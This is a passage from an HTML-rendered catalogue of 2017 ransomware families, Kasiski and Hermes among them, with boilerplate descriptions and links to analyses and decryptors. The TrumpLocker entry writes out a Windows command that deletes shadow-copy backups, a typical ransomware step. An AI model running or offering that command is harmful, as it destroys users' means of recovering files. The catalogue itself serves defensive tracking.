<h3 id="_consoleapplication1_ransomware"><a class="anchor" href="#_consoleapplication1_ransomware"></a><a class="link" href="#_consoleapplication1_ransomware">ConsoleApplication1 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1701. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/consoleapplication1-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/consoleapplication1-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_krider_ransomware"><a class="anchor" href="#_krider_ransomware"></a><a class="link" href="#_krider_ransomware">KRider Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1702. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/836995570384453632">https://twitter.com/malwrhunterteam/status/836995570384453632</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyr_locker_ransomware_fake"><a class="anchor" href="#_cyr_locker_ransomware_fake"></a><a class="link" href="#_cyr_locker_ransomware_fake">CYR-Locker Ransomware (FAKE)</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The following note is what you get if you put in the wrong key code: <a href="https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg" class="bare">https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1703. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&amp;updated-max=2018-01-01T00:00:00-08:00&amp;max-results=50">https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&amp;updated-max=2018-01-01T00:00:00-08:00&amp;max-results=50</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dotransomware"><a class="anchor" href="#_dotransomware"></a><a class="link" href="#_dotransomware">DotRansomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1704. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/dotransomware.html">https://id-ransomware.blogspot.co.il/2017/02/dotransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unlock26_ransomware"><a class="anchor" href="#_unlock26_ransomware"></a><a class="link" href="#_unlock26_ransomware">Unlock26 Ransomware</a></h3>
<div class="paragraph">
<p>About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments.All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1705. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/">https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_picklesransomware"><a class="anchor" href="#_picklesransomware"></a><a class="link" href="#_picklesransomware">PicklesRansomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1706. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/pickles-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/pickles-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/834821166116327425">https://twitter.com/JakubKroustek/status/834821166116327425</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vanguard_ransomware"><a class="anchor" href="#_vanguard_ransomware"></a><a class="link" href="#_vanguard_ransomware">Vanguard Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses at MSOffice to fool users into opening the infected file. GO Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1707. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JAMESWT_MHT/status/834783231476166657">https://twitter.com/JAMESWT_MHT/status/834783231476166657</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pyl33t_ransomware"><a class="anchor" href="#_pyl33t_ransomware"></a><a class="link" href="#_pyl33t_ransomware">PyL33T Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1708. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/Jan0fficial/status/834706668466405377">https://twitter.com/Jan0fficial/status/834706668466405377</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trumplocker_ransomware"><a class="anchor" href="#_trumplocker_ransomware"></a><a class="link" href="#_trumplocker_ransomware">TrumpLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This is the old VenusLocker in disquise .To delete shadow files use the following commend: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&amp;exit <a href="https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg" class="bare">https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1709. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/">https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html">https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-24th-2017-trump-locker-macos-rw-and-cryptomix/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-24th-2017-trump-locker-macos-rw-and-cryptomix/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_damage_ransomware"><a class="anchor" href="#_damage_ransomware"></a><a class="link" href="#_damage_ransomware">Damage Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Written in Delphi</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1710. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/damage">https://decrypter.emsisoft.com/damage</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/835664067843014656">https://twitter.com/demonslay335/status/835664067843014656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xyzware_ransomware"><a class="anchor" href="#_xyzware_ransomware"></a><a class="link" href="#_xyzware_ransomware">XYZWare Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1711. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/833636006721122304">https://twitter.com/malwrhunterteam/status/833636006721122304</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_youarefucked_ransomware"><a class="anchor" href="#_youarefucked_ransomware"></a><a class="link" href="#_youarefucked_ransomware">YouAreFucked Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1712. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.enigmasoftware.com/youarefuckedransomware-removal/">https://www.enigmasoftware.com/youarefuckedransomware-removal/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptconsole_2_0_ransomware"><a class="anchor" href="#_cryptconsole_2_0_ransomware"></a><a class="link" href="#_cryptconsole_2_0_ransomware">CryptConsole 2.0 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1713. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_barrax_ransomware"><a class="anchor" href="#_barrax_ransomware"></a><a class="link" href="#_barrax_ransomware">BarRax Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear</p>
</div>
<div class="paragraph">
<p>BarRax Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BarRaxCrypt Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1714. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/835668540367777792">https://twitter.com/demonslay335/status/835668540367777792</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptolocker_by_ntk_ransomware"><a class="anchor" href="#_cryptolocker_by_ntk_ransomware"></a><a class="link" href="#_cryptolocker_by_ntk_ransomware">CryptoLocker by NTK Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1715. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_userfileslocker_ransomware"><a class="anchor" href="#_userfileslocker_ransomware"></a><a class="link" href="#_userfileslocker_ransomware">UserFilesLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>UserFilesLocker Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CzechoSlovak Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1716. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_avastvirusinfo_ransomware"><a class="anchor" href="#_avastvirusinfo_ransomware"></a><a class="link" href="#_avastvirusinfo_ransomware">AvastVirusinfo Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMENENT!!!!</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1717. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017_03_01_archive.html">https://id-ransomware.blogspot.co.il/2017_03_01_archive.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_suchsecurity_ransomware"><a class="anchor" href="#_suchsecurity_ransomware"></a><a class="link" href="#_suchsecurity_ransomware">SuchSecurity Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1718. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pleaseread_ransomware"><a class="anchor" href="#_pleaseread_ransomware"></a><a class="link" href="#_pleaseread_ransomware">PleaseRead Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>PleaseRead Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>VHDLocker Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1719. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kasiski_ransomware"><a class="anchor" href="#_kasiski_ransomware"></a><a class="link" href="#_kasiski_ransomware">Kasiski Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1720. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/MarceloRivero/status/832302976744173570">https://twitter.com/MarceloRivero/status/832302976744173570</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fake_locky_ransomware"><a class="anchor" href="#_fake_locky_ransomware"></a><a class="link" href="#_fake_locky_ransomware">Fake Locky Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Fake Locky Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Locky Impersonator Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1721. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-locky-ransomware-encrypts-local-files-and-unmapped-network-shares/">https://www.bleepingcomputer.com/news/security/the-locky-ransomware-encrypts-local-files-and-unmapped-network-shares/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/locky-impersonator.html">https://id-ransomware.blogspot.co.il/2017/02/locky-impersonator.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-thor-extension-after-being-a-bad-malware/">https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-thor-extension-after-being-a-bad-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoshield_1_0_ransomware"><a class="anchor" href="#_cryptoshield_1_0_ransomware"></a><a class="link" href="#_cryptoshield_1_0_ransomware">CryptoShield 1.0 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoShield 1.0 is a ransomware from the CryptoMix family.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1722. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptoshield-2-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptoshield-2-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/cryptomix-variant-named-cryptoshield-1-0-ransomware-distributed-by-exploit-kits/">https://www.bleepingcomputer.com/news/security/cryptomix-variant-named-cryptoshield-1-0-ransomware-distributed-by-exploit-kits/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hermes_ransomware"><a class="anchor" href="#_hermes_ransomware"></a><a class="link" href="#_hermes_ransomware">Hermes Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Filemarker: "HERMES"</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1723. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/642019/hermes-ransomware-help-support-decrypt-informationhtml/">https://www.bleepingcomputer.com/forums/t/642019/hermes-ransomware-help-support-decrypt-informationhtml/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/hermes-ransomware-decrypted-in-live-video-by-emsisofts-fabian-wosar/">https://www.bleepingcomputer.com/news/security/hermes-ransomware-decrypted-in-live-video-by-emsisofts-fabian-wosar/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lovelock_ransomware_or_love2lock_ransomware"><a class="anchor" href="#_lovelock_ransomware_or_love2lock_ransomware"></a><a class="link" href="#_lovelock_ransomware_or_love2lock_ransomware">LoveLock Ransomware or Love2Lock Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1724. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wcry_ransomware"><a class="anchor" href="#_wcry_ransomware"></a><a class="link" href="#_wcry_ransomware">Wcry Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1725. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
